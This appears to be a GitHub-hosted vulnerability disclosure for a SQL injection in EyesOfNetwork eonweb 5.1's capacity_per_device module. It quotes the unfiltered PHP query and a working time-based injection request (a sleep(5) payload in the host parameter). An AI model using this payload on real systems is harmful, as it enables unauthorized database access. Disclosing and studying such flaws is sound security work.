Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
Eonweb_module/capacity_per_device/index.php the host parameter has SQL injection vulnerability
Powered by Shaojie Jiang from 360 SkyEye Labs
version: 5.1
https://github.com/EyesOfNetworkCommunity/eonweb
Vulnerability details
# 0x01
module/capacity_per_device/index.php Line 41
if(isset($_GET['host'])){
$graphlocal_hostid = $_GET['host'];
module/capacity_per_device/index.php Line 80
<?php
if(count($_GET)>0 && $error == false)
{
# --- Get the graph id from the host id
if(isset($graphlocal_hostid)){
$result_graph= sqlrequest($database_cacti,"SELECT id FROM graph_local WHERE host_id='$graphlocal_hostid' ");
$nbr_ligne_graph = mysqli_num_rows($result_graph);
for ($i=0;$i<$nbr_ligne_graph;$i++)
$graphlocal_hostid has not been filtered to cause SQL injection vulnerability
EXP:
GET /module/capacity_per_device/index.php?date=2&submit=Show+graphs&host=11%27%20and%20sleep(5)%20%23 HTTP/1.1
Host: 192.168.242.131
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Cookie: session_id=1016781291; user_name=admin; user_id=1; user_limitation=0; group_id=1; Cacti=29oildver3o6kn7am6vh3d1sq5; pnp4nagios=jstbh8aivjj1eai2ncru3rbnd4
Connection: keep-alive
Upgrade-Insecure-Requests: 1
The page will be delayed for 5 seconds